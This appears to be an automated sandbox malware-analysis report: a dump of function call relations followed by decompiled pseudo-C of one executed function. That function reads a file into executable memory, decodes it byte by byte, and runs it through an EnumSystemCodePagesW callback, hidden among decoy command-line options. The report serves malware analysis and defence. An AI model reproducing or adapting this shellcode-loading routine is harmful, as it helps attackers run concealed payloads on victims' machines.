b1d35a 11991->11993 12000 b2077b 11992->12000 11997 b207ec 11993->11997 11996 b1d341 11996->11926 11998 b2077b 32 API calls 11997->11998 11999 b207fe 11998->11999 11999->11996 12003 b209de 12000->12003 12004 b209ea __FrameHandler3::FrameUnwindToState 12003->12004 12011 b2255d EnterCriticalSection 12004->12011 12006 b209f8 12012 b20802 12006->12012 12008 b20a05 12022 b20a2d 12008->12022 12011->12006 12013 b2081d 12012->12013 12014 b20890 _unexpected 12012->12014 12013->12014 12015 b20870 12013->12015 12025 b2593f 12013->12025 12014->12008 12015->12014 12016 b2593f 32 API calls 12015->12016 12018 b20886 12016->12018 12020 b236c3 ___free_lconv_mon 14 API calls 12018->12020 12019 b20866 12021 b236c3 ___free_lconv_mon 14 API calls 12019->12021 12020->12014 12021->12015 12053 b22574 LeaveCriticalSection 12022->12053 12024 b207ac 12024->11996 12026 b25967 12025->12026 12027 b2594c 12025->12027 12028 b25976 12026->12028 12034 b28704 12026->12034 12027->12026 12029 b25958 12027->12029 12041 b25e23 12028->12041 12031 b247e4 ___std_exception_copy 14 API calls 12029->12031 12033 b2595d __FrameHandler3::FrameUnwindToState 12031->12033 12033->12019 12035 b28724 HeapSize 12034->12035 12036 b2870f 12034->12036 12035->12028 12037 b247e4 ___std_exception_copy 14 API calls 12036->12037 12038 b28714 12037->12038 12039 b23796 ___std_exception_copy 29 API calls 12038->12039 12040 b2871f 12039->12040 12040->12028 12042 b25e30 12041->12042 12043 b25e3b 12041->12043 12045 b248ce 15 API calls 12042->12045 12044 b25e43 12043->12044 12051 b25e4c _unexpected 12043->12051 12046 b236c3 ___free_lconv_mon 14 API calls 12044->12046 12049 b25e38 12045->12049 12046->12049 12047 b25e51 12050 b247e4 ___std_exception_copy 14 API calls 12047->12050 12048 b25e76 HeapReAlloc 12048->12049 12048->12051 12049->12033 12050->12049 12051->12047 12051->12048 12052 b239ff _unexpected 2 API calls 12051->12052 12052->12051 12053->12024 12055 b203de 12054->12055 12059 b20410 12054->12059 12056 b24871 _unexpected 14 API calls 12055->12056 12055->12059 12057 b20407 12056->12057 12058 b236c3 ___free_lconv_mon 14 API calls 12057->12058 12058->12059 12059->11962 12059->11963 12061 b2502b 12060->12061 12062 b2504b 12061->12062 12071 b25061 12061->12071 12063 b247e4 ___std_exception_copy 14 API calls 12062->12063 12064 b25050 12063->12064 12065 b23796 ___std_exception_copy 29 API calls 12064->12065 12082 b2505a 12065->12082 12066 b250d5 12066->12066 12067 b203cd 14 API calls 12066->12067 12069 b2511f 12067->12069 12072 b25128 12069->12072 12080 b25141 12069->12080 12071->12066 12074 b250e9 12071->12074 12088 b25293 12071->12088 12120 b25347 12071->12120 12075 b236c3 ___free_lconv_mon 14 API calls 12072->12075 12073 b1db25 _ValidateLocalCookies 5 API calls 12076 b20504 12073->12076 12136 b251e3 12074->12136 12075->12074 12076->11971 12076->11972 12077 b251af 12078 b236c3 ___free_lconv_mon 14 API calls 12077->12078 12081 b251bc 12078->12081 12080->12077 12080->12080 12085 b251d6 12080->12085 12142 b24980 12080->12142 12083 b251e3 14 API calls 12081->12083 12082->12073 12083->12082 12086 b237a6 ___std_exception_copy 11 API calls 12085->12086 12087 b251e2 12086->12087 12089 b252a3 12088->12089 12089->12089 12090 b24871 _unexpected 14 API calls 12089->12090 12105 b252c1 12089->12105 12091 b252d6 12090->12091 12092 b252e9 12091->12092 12093 b24980 29 API calls 12091->12093 12094 b24980 29 API calls 12092->12094 12096 b2533a 12092->12096 12093->12092 12095 b25302 12094->12095 12095->12096 12097 b25309 12095->12097 12098 b237a6 ___std_exception_copy 11 API calls 12096->12098 12151 b2520c 12097->12151 12106 b25346 12098->12106 12101 b2531f 12103 b236c3 ___free_lconv_mon 14 API calls 12101->12103 12102 b236c3 ___free_lconv_mon 14 API calls 12102->12101 12103->12105 12104 b253a1 12108 b25293 32 API calls 12104->12108 12105->12071 12106->12104 12107 b253c0 FindFirstFileExW 12106->12107 12107->12104 12114 b253f7 12107->12114 12109 b253ac 12108->12109 12111 b1db25 _ValidateLocalCookies 5 API calls 12109->12111 12110 b25455 FindNextFileW 12110->12114 12115 b2546a 12110->12115 12113 b254bb 12111->12113 12112 b25293 32 API calls 12112->12114 12113->12071 12114->12110 12114->12112 12116 b254a1 FindClose 12114->12116 12117 b2547e FindClose 12115->12117 12162 b280b0 12115->12162 12116->12109 12117->12109 12121 b25372 12120->12121 12122 b253a1 12121->12122 12123 b253c0 FindFirstFileExW 12121->12123 12124 b25293 36 API calls 12122->12124 12123->12122 12130 b253f7 12123->12130 12125 b253ac 12124->12125 12127 b1db25 _ValidateLocalCookies 5 API calls 12125->12127 12126 b25455 FindNextFileW 12126->12130 12131 b2546a 12126->12131 12129 b254bb 12127->12129 12128 b25293 36 API calls 12128->12130 12129->12071 12130->12126 12130->12128 12132 b254a1 FindClose 12130->12132 12133 b2547e FindClose 12131->12133 12134 b280b0 29 API calls 12131->12134 12132->12125 12133->12125 12135 b2549c 12134->12135 12135->12133 12137 b25200 12136->12137 12138 b251f0 12136->12138 12140 b236c3 ___free_lconv_mon 14 API calls 12137->12140 12138->12137 12139 b236c3 ___free_lconv_mon 14 API calls 12138->12139 12139->12138 12141 b25208 12140->12141 12141->12082 12146 b2498b 12142->12146 12143 b249a5 12144 b249b9 12143->12144 12145 b247e4 ___std_exception_copy 14 API calls 12143->12145 12144->12080 12147 b249af 12145->12147 12146->12143 12146->12144 12149 b249e3 12146->12149 12148 b23796 ___std_exception_copy 29 API calls 12147->12148 12148->12144 12149->12144 12150 b247e4 ___std_exception_copy 14 API calls 12149->12150 12150->12147 12152 b2521e 12151->12152 12161 b2521a 12151->12161 12153 b25223 12152->12153 12154 b25249 12152->12154 12155 b24871 _unexpected 14 API calls 12153->12155 12156 b2593f 32 API calls 12154->12156 12154->12161 12157 b2522c 12155->12157 12158 b25269 12156->12158 12159 b236c3 ___free_lconv_mon 14 API calls 12157->12159 12160 b236c3 ___free_lconv_mon 14 API calls 12158->12160 12159->12161 12160->12161 12161->12101 12161->12102 12163 b280ea 12162->12163 12164 b247e4 ___std_exception_copy 14 API calls 12163->12164 12169 b280fe 12163->12169 12165 b280f3 12164->12165 12166 b23796 ___std_exception_copy 29 API calls 12165->12166 12166->12169 12167 b1db25 _ValidateLocalCookies 5 API calls 12168 b2549c 12167->12168 12168->12117 12169->12167 12171 b20711 12170->12171 12175 b20731 12170->12175 12172 b247e4 ___std_exception_copy 14 API calls 12171->12172 12173 b20727 12172->12173 12174 b23796 ___std_exception_copy 29 API calls 12173->12174 12174->12175 12175->11980 10880 b248ce 10881 b2490c 10880->10881 10885 b248dc _unexpected 10880->10885 10882 b247e4 ___std_exception_copy 14 API calls 10881->10882 10884 b2490a 10882->10884 10883 b248f7 RtlAllocateHeap 10883->10884 10883->10885 10885->10881 10885->10883 10886 b239ff _unexpected 2 API calls 10885->10886 10886->10885 12726 b2032d 12729 b20354 12726->12729 12730 b20360 __FrameHandler3::FrameUnwindToState 12729->12730 12737 b2255d EnterCriticalSection 12730->12737 12732 b2036a 12733 b20398 12732->12733 12735 b24fd0 ___scrt_uninitialize_crt 14 API calls 12732->12735 12738 b203b6 12733->12738 12735->12732 12737->12732 12741 b22574 LeaveCriticalSection 12738->12741 12740 b20352 12741->12740 12793 b24141 12794 b23d9d ___scrt_uninitialize_crt 79 API calls 12793->12794 12795 b24149 12794->12795 12803 b270f1 12795->12803 12797 b2414e 12813 b2719c 12797->12813 12800 b24178 12801 b236c3 ___free_lconv_mon 14 API calls 12800->12801 12802 b24183 12801->12802 12804 b270fd __FrameHandler3::FrameUnwindToState 12803->12804 12817 b2255d EnterCriticalSection 12804->12817 12806 b27174 12822 b27193 12806->12822 12809 b27148 DeleteCriticalSection 12810 b236c3 ___free_lconv_mon 14 API calls 12809->12810 12812 b27108 12810->12812 12812->12806 12812->12809 12818 b28ae6 12812->12818 12814 b271b3 12813->12814 12816 b2415d DeleteCriticalSection 12813->12816 12815 b236c3 ___free_lconv_mon 14 API calls 12814->12815 12814->12816 12815->12816 12816->12797 12816->12800 12817->12812 12819 b28af9 ___std_exception_copy 12818->12819 12825 b28ba4 12819->12825 12821 b28b05 ___std_exception_copy 12821->12812 12897 b22574 LeaveCriticalSection 12822->12897 12824 b27180 12824->12797 12826 b28bb0 __FrameHandler3::FrameUnwindToState 12825->12826 12827 b28bba 12826->12827 12828 b28bdd 12826->12828 12829 b23922 ___std_exception_copy 29 API calls 12827->12829 12835 b28bd5 12828->12835 12836 b24051 EnterCriticalSection 12828->12836 12829->12835 12831 b28bfb 12837 b28b16 12831->12837 12833 b28c08 12851 b28c33 12833->12851 12835->12821 12836->12831 12838 b28b23 12837->12838 12839 b28b46 12837->12839 12840 b23922 ___std_exception_copy 29 API calls 12838->12840 12841 b23e0b ___scrt_uninitialize_crt 75 API calls 12839->12841 12842 b28b3e 12839->12842 12840->12842 12843 b28b5e 12841->12843 12842->12833 12844 b2719c 14 API calls 12843->12844 12845 b28b66 12844->12845 12846 b26614 ___scrt_uninitialize_crt 29 API calls 12845->12846 12847 b28b72 12846->12847 12854 b29098 12847->12854 12850 b236c3 ___free_lconv_mon 14 API calls 12850->12842 12896 b24065 LeaveCriticalSection 12851->12896 12853 b28c39 12853->12835 12855 b290c1 12854->12855 12858 b28b79 12854->12858 12856 b29110 12855->12856 12859 b290e8 12855->12859 12857 b23922 ___std_exception_copy 29 API calls 12856->12857 12857->12858 12858->12842 12858->12850 12861 b2913b 12859->12861 12862 b29147 __FrameHandler3::FrameUnwindToState 12861->12862 12869 b25dae EnterCriticalSection 12862->12869 12864 b29155 12865 b29186 12864->12865 12870 b28ff8 12864->12870 12883 b291c0 12865->12883 12869->12864 12871 b25b65 ___scrt_uninitialize_crt 29 API calls 12870->12871 12873 b29008 12871->12873 12872 b2900e 12886 b25bcf 12872->12886 12873->12872 12875 b25b65 ___scrt_uninitialize_crt 29 API calls 12873->12875 12882 b29040 12873->12882 12878 b29037 12875->12878 12876 b25b65 ___scrt_uninitialize_crt 29 API calls 12879 b2904c CloseHandle 12876->12879 12877 b29066 ___scrt_uninitialize_crt 12877->12865 12880 b25b65 ___scrt_uninitialize_crt 29 API calls 12878->12880 12879->12872 12881 b29058 GetLastError 12879->12881 12880->12882 12881->12872 12882->12872 12882->12876 12895 b25dd1 LeaveCriticalSection 12883->12895 12885 b291a9 12885->12858 12887 b25c45 12886->12887 12888 b25bde 12886->12888 12889 b247e4 ___std_exception_copy 14 API calls 12887->12889 12888->12887 12893 b25c08 12888->12893 12890 b25c4a 12889->12890 12891 b247f7 ___scrt_uninitialize_crt 14 API calls 12890->12891 12892 b25c35 12891->12892 12892->12877 12893->12892 12894 b25c2f SetStdHandle 12893->12894 12894->12892 12895->12885 12896->12853 12897->12824

                                              Executed Functions

                                              Function 00B118D0 Relevance: 33.7, APIs: 10, Strings: 9, Instructions: 441filememoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 b118d0-b11939 call b20fd1 3 b1194b-b11a1d call b1fc30 CreateFileW GetFileSize VirtualAlloc ReadFile 0->3 4 b1193f-b11946 0->4 8 b11a20-b11ad3 3->8 5 b1206c-b12078 4->5 9 b11ad9 8->9 10 b11ade-b11afd EnumSystemCodePagesW call b20f4d 8->10 9->8 12 b11b02 10->12 13 b11b09-b11b0f 12->13 14 b11b15-b11b28 13->14 15 b11b2d-b11b64 GetOEMCP call b20f42 13->15 14->13 18 b11b76 15->18 19 b11b6a-b11b71 15->19 20 b11b7d-b11b83 18->20 19->5 21 b11e83-b11e8a 20->21 22 b11b89-b11ba8 call b211b7 20->22 23 b11e90-b11e97 21->23 24 b11e9c-b11ea0 21->24 31 b11bba-b11bd9 call b211b7 22->31 32 b11bae-b11bb5 22->32 23->5 26 b11ea6 24->26 27 b11ead-b11eb1 24->27 26->27 29 b11eb7 27->29 30 b11ebe-b11eed call b12080 27->30 29->30 38 b11ef3-b11efa 30->38 39 b11eff-b11f03 30->39 40 b11bff-b11c1e call b211b7 31->40 41 b11bdf-b11bfa 31->41 34 b11e75-b11e7e 32->34 34->20 38->5 43 b11fa5-b11fb9 call b123e0 39->43 44 b11f09-b11f3a GetStdHandle * 2 39->44 49 b11c24-b11c30 40->49 50 b11cac-b11ccb call b211b7 40->50 41->34 57 b11fcb-b12010 GetStartupInfoW call b21219 call b12750 43->57 58 b11fbf-b11fc6 43->58 47 b11f40-b11f47 44->47 48 b11f4d-b11f65 call b122b0 44->48 47->48 52 b11f96 47->52 61 b11f91 48->61 62 b11f6b-b11f7f call b12340 48->62 54 b11c42-b11c6c call b21341 49->54 55 b11c36-b11c3d 49->55 67 b11cd1-b11cdd 50->67 68 b11d59-b11d78 call b211b7 50->68 56 b11fa0 52->56 77 b11c72-b11c79 54->77 78 b11c7f-b11c86 54->78 55->5 64 b12051-b12069 call b12980 56->64 87 b12025-b12030 57->87 88 b12016-b12020 57->88 58->5 61->56 62->61 82 b11f85-b11f8c 62->82 64->5 73 b11ce3-b11cea 67->73 74 b11cef-b11d19 call b21341 67->74 91 b11de0-b11dff call b211b7 68->91 92 b11d7e-b11d8a 68->92 73->5 94 b11d2c-b11d33 74->94 95 b11d1f-b11d26 74->95 77->78 83 b11c9b-b11ca2 77->83 78->83 84 b11c8c-b11c95 78->84 82->5 83->5 84->83 90 b11ca7 84->90 93 b12035-b1204e ShowWindow 87->93 88->93 90->34 104 b11e05-b11e11 91->104 105 b11e69-b11e70 91->105 97 b11d90-b11d97 92->97 98 b11d9c-b11dc9 call b21341 92->98 93->64 100 b11d48-b11d4f 94->100 102 b11d39-b11d42 94->102 95->94 95->100 97->5 107 b11ddb 98->107 108 b11dcf-b11dd6 98->108 100->5 102->100 106 b11d54 102->106 109 b11e23-b11e52 call b21341 104->109 110 b11e17-b11e1e 104->110 105->5 106->34 107->34 108->5 113 b11e64 109->113 114 b11e58-b11e5f 109->114 110->5 113->34 114->5
                                              C-Code - Quality: 17%
                                              			E00B118D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				struct _OVERLAPPED* _t228;
				void* _t232;
				void* _t236;
				int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t262;
				signed int _t264;
				signed int _t267;
				void* _t279;
				void* _t280;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				signed int _t293;
				signed int _t296;
				signed int _t299;
				signed int _t302;
				signed int _t304;
				signed int _t312;
				signed int _t318;
				signed int _t325;
				intOrPtr _t350;
				void* _t399;
				void* _t402;
				void* _t406;
				signed int* _t407;
				signed int* _t408;
				intOrPtr* _t409;
				signed int* _t410;
				intOrPtr* _t411;
				signed int* _t412;
				intOrPtr* _t414;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900; // executed
				_t228 = E00B20FD1(); // executed
				_v76 = _t228;
				if(_v76 != 0) {
					E00B1FC30(_t399, _v76, 0x54, 0x3d0900);
					_t232 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0); // executed
					_v44 = _t232;
					_v48 = GetFileSize(_v44, 0);
					_t236 = VirtualAlloc(0, _v48, 0x3000, 0x40); // executed
					_v40 = _t236;
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0); // executed
					_t406 = _t402 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x44;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000e4;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xfb;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x18;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xe0;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??); // executed
					_t407 = _t406 - 8;
					 *_t407 = _v76;
					E00B20F4D();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0xb34918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t257 = GetOEMCP();
					 *0xb349b8 = _t257;
					 *0xb349b4 = _t257;
					 *0xb349a4 = 0x32;
					_t258 =  *0xb349a4; // 0x0
					 *_t407 = _t258;
					_v176 = 4;
					_t259 = E00B20F42();
					 *0xb349a0 = _t259;
					__eflags = _t259;
					if(_t259 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t287 = E00B211B7();
							__eflags = _t287;
							if(_t287 != 0) {
								 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t290 = E00B211B7();
								__eflags = _t290;
								if(_t290 != 0) {
									 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t293 = E00B211B7();
									__eflags = _t293;
									if(_t293 != 0) {
										 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t296 = E00B211B7();
										__eflags = _t296;
										if(_t296 != 0) {
											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t299 = E00B211B7();
											__eflags = _t299;
											if(_t299 != 0) {
												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t302 = E00B211B7();
												__eflags = _t302;
												if(_t302 != 0) {
													_v16 = 1;
												} else {
													_t304 = _v68 + 1;
													_v68 = _t304;
													__eflags = _t304 - _v52;
													if(_t304 != _v52) {
														 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0xb34914 = E00B21341();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t312 = _v68 + 1;
												_v68 = _t312;
												__eflags = _t312 - _v52;
												if(_t312 != _v52) {
													 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E00B21341();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t318 = _v68 + 1;
											_v68 = _t318;
											__eflags = _t318 - _v52;
											if(_t318 != _v52) {
												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E00B21341();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0xb34920;
													if( *0xb34920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t325 = _v68 + 1;
										_v68 = _t325;
										__eflags = _t325 - _v52;
										if(_t325 != _v52) {
											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E00B21341();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0xb34920;
												if( *0xb34920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0xb34920 = 1;
									 *0xb34924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
							goto L72;
						}
						__eflags =  *0xb34914;
						if( *0xb34914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
							 *_t407 = 0xb34914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t262 = E00B12080(__eflags);
							_t408 = _t407 - 0x10;
							 *0xb3491c = _t262;
							__eflags = _t262;
							if(_t262 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t408 = 0xb34914;
									_t264 = E00B123E0(0);
									_t409 = _t408 - 4;
									__eflags = _t264;
									if(_t264 != 0) {
										 *_t409 =  &_v144;
										GetStartupInfoW(??);
										_t410 = _t409 - 4;
										 *_t410 = _v132;
										_t267 = E00B21219();
										 *_t410 = 0xb34914;
										_v176 = _v132;
										_v172 = _t267 << 1;
										E00B12750();
										_t411 = _t410 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t350 =  *0xb349bc; // 0x0
										 *_t411 = _t350;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t412 = _t411 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t408 = 0xfffffff6;
									_t279 = GetStdHandle(??);
									_t414 = _t408 - 4;
									 *0xb349c4 = _t279;
									 *_t414 = 0xfffffff5;
									_t280 = GetStdHandle(??);
									_t412 = _t414 - 4;
									 *0xb349c8 = _t280;
									__eflags =  *0xb349c4;
									if( *0xb349c4 != 0) {
										L59:
										 *_t412 = 0xb34914;
										E00B122B0();
										_t412 = _t412 - 4;
										__eflags =  *0xb34920;
										if( *0xb34920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t412 = 0xb34914;
											_t284 = E00B12340();
											_t412 = _t412 - 4;
											__eflags = _t284;
											if(_t284 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0xb349c8;
										if( *0xb349c8 == 0) {
											 *0xb34928 = 1;
											L64:
											L71:
											 *_t412 = 0xb34914;
											_v176 = _v32;
											_v16 = E00B12980();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
				L72:
				return _v16;
			}
































































                                              0x00b118e7
                                              0x00b118ee
                                              0x00b118f5
                                              0x00b118fc
                                              0x00b11903
                                              0x00b1190a
                                              0x00b11911
                                              0x00b11918
                                              0x00b1191f
                                              0x00b11926
                                              0x00b1192d
                                              0x00b11932
                                              0x00b11939
                                              0x00b11961
                                              0x00b1199e
                                              0x00b119a7
                                              0x00b119c3
                                              0x00b119e6
                                              0x00b119ef
                                              0x00b119fe
                                              0x00b11a17
                                              0x00b11a1d
                                              0x00b11a20
                                              0x00b11a2c
                                              0x00b11a3c
                                              0x00b11a4f
                                              0x00b11a62
                                              0x00b11a71
                                              0x00b11a81
                                              0x00b11a94
                                              0x00b11aa3
                                              0x00b11ab2
                                              0x00b11ac1
                                              0x00b11aca
                                              0x00b11ad0
                                              0x00b11ad3
                                              0x00000000
                                              0x00000000
                                              0x00b11ad9
                                              0x00b11ae1
                                              0x00b11ae3
                                              0x00b11ae6
                                              0x00b11aee
                                              0x00b11af4
                                              0x00b11afa
                                              0x00b11afd
                                              0x00b11b02
                                              0x00b11b09
                                              0x00b11b0c
                                              0x00b11b0f
                                              0x00000000
                                              0x00000000
                                              0x00b11b15
                                              0x00b11b25
                                              0x00b11b25
                                              0x00b11b2d
                                              0x00b11b33
                                              0x00b11b38
                                              0x00b11b3d
                                              0x00b11b47
                                              0x00b11b4c
                                              0x00b11b4f
                                              0x00b11b57
                                              0x00b11b5c
                                              0x00b11b61
                                              0x00b11b64
                                              0x00b11b76
                                              0x00b11b7d
                                              0x00b11b80
                                              0x00b11b83
                                              0x00000000
                                              0x00000000
                                              0x00b11b99
                                              0x00b11b9c
                                              0x00b11ba0
                                              0x00b11ba5
                                              0x00b11ba8
                                              0x00b11bca
                                              0x00b11bcd
                                              0x00b11bd1
                                              0x00b11bd6
                                              0x00b11bd9
                                              0x00b11c0f
                                              0x00b11c12
                                              0x00b11c16
                                              0x00b11c1b
                                              0x00b11c1e
                                              0x00b11cbc
                                              0x00b11cbf
                                              0x00b11cc3
                                              0x00b11cc8
                                              0x00b11ccb
                                              0x00b11d69
                                              0x00b11d6c
                                              0x00b11d70
                                              0x00b11d75
                                              0x00b11d78
                                              0x00b11df0
                                              0x00b11df3
                                              0x00b11df7
                                              0x00b11dfc
                                              0x00b11dff
                                              0x00b11e69
                                              0x00b11e05
                                              0x00b11e08
                                              0x00b11e0b
                                              0x00b11e0e
                                              0x00b11e11
                                              0x00b11e32
                                              0x00b11e35
                                              0x00b11e39
                                              0x00b11e46
                                              0x00b11e4e
                                              0x00b11e52
                                              0x00000000
                                              0x00b11e58
                                              0x00b11e58
                                              0x00b11e58
                                              0x00b11e17
                                              0x00b11e17
                                              0x00b11e17
                                              0x00b11e11
                                              0x00b11d7e
                                              0x00b11d81
                                              0x00b11d84
                                              0x00b11d87
                                              0x00b11d8a
                                              0x00b11dab
                                              0x00b11dae
                                              0x00b11db2
                                              0x00b11dbf
                                              0x00b11dc5
                                              0x00b11dc9
                                              0x00000000
                                              0x00b11dcf
                                              0x00b11dcf
                                              0x00b11dcf
                                              0x00b11d90
                                              0x00b11d90
                                              0x00b11d90
                                              0x00b11d8a
                                              0x00b11cd1
                                              0x00b11cd4
                                              0x00b11cd7
                                              0x00b11cda
                                              0x00b11cdd
                                              0x00b11cfe
                                              0x00b11d01
                                              0x00b11d05
                                              0x00b11d12
                                              0x00b11d15
                                              0x00b11d19
                                              0x00b11d2c
                                              0x00b11d2c
                                              0x00b11d33
                                              0x00000000
                                              0x00b11d39
                                              0x00b11d3f
                                              0x00b11d42
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11d42
                                              0x00b11d1f
                                              0x00b11d1f
                                              0x00b11d26
                                              0x00b11d48
                                              0x00b11d48
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11d26
                                              0x00b11ce3
                                              0x00b11ce3
                                              0x00b11ce3
                                              0x00b11cdd
                                              0x00b11c24
                                              0x00b11c27
                                              0x00b11c2a
                                              0x00b11c2d
                                              0x00b11c30
                                              0x00b11c51
                                              0x00b11c54
                                              0x00b11c58
                                              0x00b11c65
                                              0x00b11c68
                                              0x00b11c6c
                                              0x00b11c7f
                                              0x00b11c7f
                                              0x00b11c86
                                              0x00000000
                                              0x00b11c8c
                                              0x00b11c92
                                              0x00b11c95
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11c95
                                              0x00b11c72
                                              0x00b11c72
                                              0x00b11c79
                                              0x00b11c9b
                                              0x00b11c9b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00b11c79
                                              0x00b11c36
                                              0x00b11c36
                                              0x00b11c36
                                              0x00b11c30
                                              0x00b11bdf
                                              0x00b11bdf
                                              0x00b11be9
                                              0x00b11bf3
                                              0x00000000
                                              0x00b11bf3
                                              0x00b11bae
                                              0x00b11bae
                                              0x00b11e75
                                              0x00b11e7b
                                              0x00000000
                                              0x00b11e7b
                                              0x00000000
                                              0x00b11ba8
                                              0x00b11e83
                                              0x00b11e8a
                                              0x00b11e9c
                                              0x00b11ea0
                                              0x00b11ea6
                                              0x00b11ea6
                                              0x00b11ead
                                              0x00b11eb1
                                              0x00b11eb7
                                              0x00b11eb7
                                              0x00b11eca
                                              0x00b11ecd
                                              0x00b11ed5
                                              0x00b11ed9
                                              0x00b11edd
                                              0x00b11ee2
                                              0x00b11ee5
                                              0x00b11eea
                                              0x00b11eed
                                              0x00b11eff
                                              0x00b11f03
                                              0x00b11fab
                                              0x00b11fae
                                              0x00b11fb3
                                              0x00b11fb6
                                              0x00b11fb9
                                              0x00b11fd1
                                              0x00b11fd4
                                              0x00b11fda
                                              0x00b11fe0
                                              0x00b11fe3
                                              0x00b11ff4
                                              0x00b11ff7
                                              0x00b11ffb
                                              0x00b11fff
                                              0x00b12004
                                              0x00b1200d
                                              0x00b12010
                                              0x00b1202a
                                              0x00b12016
                                              0x00b1201a
                                              0x00b1201a
                                              0x00b1203b
                                              0x00b12041
                                              0x00b12044
                                              0x00b12048
                                              0x00b1204e
                                              0x00000000
                                              0x00b11fbf
                                              0x00b11fbf
                                              0x00b11fbf
                                              0x00b11f09
                                              0x00b11f09
                                              0x00b11f10
